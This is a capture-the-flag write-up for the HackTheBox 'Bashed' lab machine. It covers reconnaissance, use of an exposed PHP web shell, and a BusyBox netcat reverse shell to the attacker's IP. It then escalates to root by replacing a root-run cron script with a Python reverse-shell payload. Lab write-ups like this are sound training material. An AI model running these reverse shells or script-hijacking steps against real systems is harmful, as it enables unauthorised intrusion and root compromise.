HackTheBox Bashed Writeup

Explore the fundamentals of cybersecurity in the Bashed Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.68 bashed.htb

Script to add hosts automatically

ip="10.10.10.68"
domain="bashed.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV bashed.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 22:23 CEST
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.051s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Directory Discovery

Start by using dirb to scan for directories on Bashed HTB:

dirb http://bashed.htb/

The scan reveals the following directories:

==> DIRECTORY: http://bashed.htb/css/                                                                        
==> DIRECTORY: http://bashed.htb/dev/                                                                        
==> DIRECTORY: http://bashed.htb/fonts/                                                                       
==> DIRECTORY: http://bashed.htb/images/                                                                           
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/     

Getting a Shell:

1. Discover the PHP Bash Web Shell

• On the website http://bashed.htb/single.html, you’ll find a link to the PHP Bash web shell source code on GitHub:
  • https://github.com/Arrexel/phpbash
• Access the live PHP Bash web shell on the server:
  • http://bashed.htb/dev/phpbash.php

2. Retrieve the User Flag

• Once inside the PHP Bash web shell, retrieve the arrexel user flag:

cat /home/arrexel/user.txt

3. Check Sudo Privileges

• After gaining access, check the sudo privileges for the current user:

sudo -l

• The output reveals:

(scriptmanager : scriptmanager) NOPASSWD: ALL

This means you can execute any command as the scriptmanager user without a password.

4. Find Readable Directories for scriptmanager

• Locate directories accessible by the scriptmanager user by running:

find / -type d -readable -user scriptmanager | grep -v '^/proc\|^/run\|^/sys'

This command lists readable directories for scriptmanager, excluding system directories like /proc, /run, and /sys.

5. Set Up a Reverse Shell Listener

• On your attacking machine, set up a listener to catch the reverse shell:

nc -lvnp 9001

6. Initiate a Reverse Shell Using BusyBox

• Since the available nc (netcat) version on the target system is netcat-openbsd, which lacks the -e option, you can use BusyBox to achieve a reverse shell. On the target machine, execute:

busybox nc 10.10.14.9 9001 -e /bin/bash

This command establishes a reverse shell connection to your listener on port 9001.

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm;

Monitor Processes with pspy

Objective: Use pspy to monitor processes without needing root privileges and identify processes being executed by root that may be exploitable.

Step 1: Download pspy

• On your attacking machine, download the appropriate pspy binary (e.g., pspy64 for 64-bit systems) from the official repository:
  • https://github.com/DominicBreuker/pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

Step 2: Transfer pspy to the Target Server Using Python HTTP Server

• On your attacking machine, start a Python HTTP server in the directory where pspy64 is located:

python3 -m http.server 8080

• On the target machine, download pspy64 using wget:

wget http://<vpn-ip>:8080/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64

Step 3: Run pspy to Monitor Processes

• Now that pspy64 is on the target machine, run it to monitor running processes:

/tmp/pspy64

• While monitoring, pspy may show processes that are periodically executed by root. For example:

2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py

• This shows that test.py is executed by root, which could be exploited by modifying the script.

1. Switch to scriptmanager User

• test.py is owned by scriptmanager, switch to scriptmanager:

sudo -u scriptmanager bash

2. Edit test.py

• Navigate to the location of test.py, which was identified by pspy, and edit the script to include a Python reverse shell payload:

nano /scripts/test.py

• Replace the contents of test.py with the following reverse shell code:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

import socket, os, pty
s = socket.socket(); s.connect(("<vpn-ip>", 9002))
for fd in (0, 1, 2): os.dup2(s.fileno(), fd)
pty.spawn("/bin/bash")

3. Set up a Listener

• On your local machine (the attacker machine), set up a listener to capture the reverse shell:

nc -lvnp 9002

4. Wait for Execution

• The test.py script is executed periodically by root, as observed in pspy. Wait for the next execution, and the reverse shell should connect to your listener.

5. Capture Root Access

• Once the reverse shell connects, you should have a shell as root. You can verify this by checking the user and reading sensitive files:

cat /root/root.txt